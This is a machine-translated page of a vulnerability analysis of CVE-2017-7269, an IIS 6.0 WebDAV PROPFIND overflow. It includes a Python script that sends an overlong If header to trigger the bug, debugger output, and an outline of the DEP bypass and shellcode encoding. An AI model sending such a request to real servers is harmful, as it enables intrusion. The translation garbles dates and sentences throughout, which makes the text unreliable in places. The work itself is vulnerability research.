In-depth analysis of the N. S. A. took 5 years of IIS vulnerability-vulnerability warning-the black bar safety net

2017-04-19T00:00:00
ID MYHACK58:62201785397
Type myhack58
Reporter 佚名
Modified 2017-04-19T00:00:00

Description

Source: Xuanwu lab

Author: Ke Liu of Tencent’s Xuanwu Lab

The ## 1. Vulnerability description

1.1 exploit description

2017 3 November 27, from South China University of technology the Zhiniang Peng and Chen Wu in GitHub [ 1 ] discloses an IIS 6.0 vulnerability exploit code, and specify its may 2016 7 month or 8 month is used for hacking activities.

The vulnerability number CVE-2017-7269 [ 2], by the malicious PROPFIND request cause: when an If the field contains a form, such as<http://localhost/xxxx> the super-long URL, can lead to a buffer overflow, including stack overflow and heap overflow one.

Microsoft from 2015 years 7 months 14 days start stop on a Windows Server 2003 Support, so this vulnerability is also not the official patch 0patch [ 3 ] provides a temporary solution.

Coincidentally, the Shadow Brokers in the 2017 year 4 June 14, announced a number of new NSA hacking tools, the author analyses after confirmation of which of the Explodingcan is CVE-2017-7269 exploit the program, and both Exploit the wording is exactly the same, there is reason to believe that both come from the same team of hand:

  • Two Exploit the basic structure of the same;
  • Are the Payload data to populate the address 0x680312c0; and
  • Are based on the KiFastSystemCall / NtProtectVirtualMemory bypass the DEP; and

This 3 month published the Exploit for the Foundation, detailed analysis of the vulnerability of the basic principles and use of skills.

1.2 principles overview

  • CStackBuffer either the stack is provided to store small amounts of data, and can also be the heap settings to store large amounts of data; and
  • For CStackBuffer allocated storage space, the error will be the number of characters as the number of bytes to use, this is the vulnerability of the underlying causes;
  • Because the stack on the presence of a cookie, you cannot directly overwrite the return address;
  • Trigger the overflow, rewriting the CStackBuffer object's memory, so that it uses the address 0x680312c0 as a storage area;
  • The Payload data is filled into the 0x680312c0; and
  • The program there is another similar vulnerability, empathy overflows after the cover on the stack a pointer to point to 0x680313c0; and
  • 0x680313c0 will be treated as an object of the start address, calling a virtual function will take over the right of control;
  • Based on the SharedUserData call KiFastSystemCall to bypass the DEP; and
  • The URL from UTF-8 conversion to UNICODE form;
  • Shellcode using the Alphanumeric form of encoding UNICODE; and

2. The vulnerability principle

2.1 environment configuration

In Windows Server 2003 R2 Standard Edition SP2 installed on IIS and enable WebDAV properties.!

Modify the Exploit to the target address, the implementation can be seen after svchost.exe start w3wp.exe the sub-process, the latter as the NETWORK SERVICE identity start. calc.exe process.!

2.2 the initial commissioning

First, for the process w3wp.exe enable PageHeap option; secondly, modify the Exploit code, to remove one of the Shellcode, so that it only sends a very long string.

import socket

sock = socket. socket(socket. AF_INET, socket. SOCK_STREAM) sock. connect(('192.168.75.134',80)) pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n' pay+='If: <http://localhost/aaaaaaa' pay+='A'*10240 pay+='>\r\n\r\n' sock. send(pay)

After the execution on the IIS server will start w3wp.exe a process does not crash, then the WinDbg attach to the process and perform the test again the code in the debugger to capture the first chance exception, you can get the following information:

  • In the httpext! ScStoragePathFromUrl+0x360 copy memory when generating a stack overflow;
  • Overflow of the contents and size of the looks is controlled;
  • Is the overflow of stack the blocks in the httpext! HrCheckIfHeader+0x0000013c disposition;
  • Crash location also is from the function httpext! HrCheckIfHeader execute over;
  • Process with exception handling, and therefore does not collapse;

$$ To capture the First Chance exception 0:020> g (e74. e80): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00005014 ebx=00002809 ecx=00000a06 edx=0781e7e0 esi=0781a7e4 edi=07821000 eip=67126fdb esp=03fef330 ebp=03fef798 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 httpext! ScStoragePathFromUrl+0x360: 67126fdb f3a5 rep movs dword ptr es:[edi],dword ptr [esi]

0:006> r ecx ecx=00000a06

0:006> db esi 0781a7e4 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A. A. A. A. A. A. A. A. 0781a7f4 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A. A. A. A. A. A. A. A. 0781a804 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A. A. A. A. A. A. A. A. 0781a814 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A. A. A. A. A. A. A. A. 0781a824 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A. A. A. A. A. A. A. A. 0781a834 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A. A. A. A. A. A. A. A. 0781a844 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A. A. A. A. A. A. A. A. 0781a854 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A. A. A. A. A. A. A. A.

$$ Target heap block allocation call stack 0:006> ! heap-p-a edi address 07821000 found in _DPH_HEAP_ROOT @ 7021000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 7023680: 781e7d8 2828 - 781e000 4000 7c83d97a ntdll! RtlAllocateHeap+0x00000e9f 5b7e1a40 staxmem! MpHeapAlloc+0x000000f3 5b7e1308 staxmem! ExchMHeapAlloc+0x00000015 67125df9 httpext! CHeap::Alloc+0x00000017 67125ee1 httpext! ExAlloc+0x00000008 67125462 httpext! HrCheckIfHeader+0x0000013c 6712561e httpext! HrCheckStateHeaders+0x00000010 6711f659 httpext! CPropFindRequest::Execute+0x000000f0 6711f7c5 httpext! DAVPropFind+0x00000047 $ $ ......

$$ Call stack 0:006> k ChildEBP RetAddr 03fef798 67119469 httpext! ScStoragePathFromUrl+0x360 03fef7ac 67125484 httpext! CMethUtil::ScStoragePathFromUrl+0x18 03fefc34 6712561e httpext! HrCheckIfHeader+0x15e 03fefc44 6711f659 httpext! HrCheckStateHeaders+0x10 03fefc78 6711f7c5 httpext! CPropFindRequest::Execute+0xf0 03fefc90 671296f2 httpext! DAVPropFind+0x47 $ $ ......

$$ Anomaly can be treated, and therefore will not crash 0:006> g (e74. e80): C++ EH exception - code e06d7363 (first chance)

[1] [2] [3] [4] [5] [6] [7] [8] next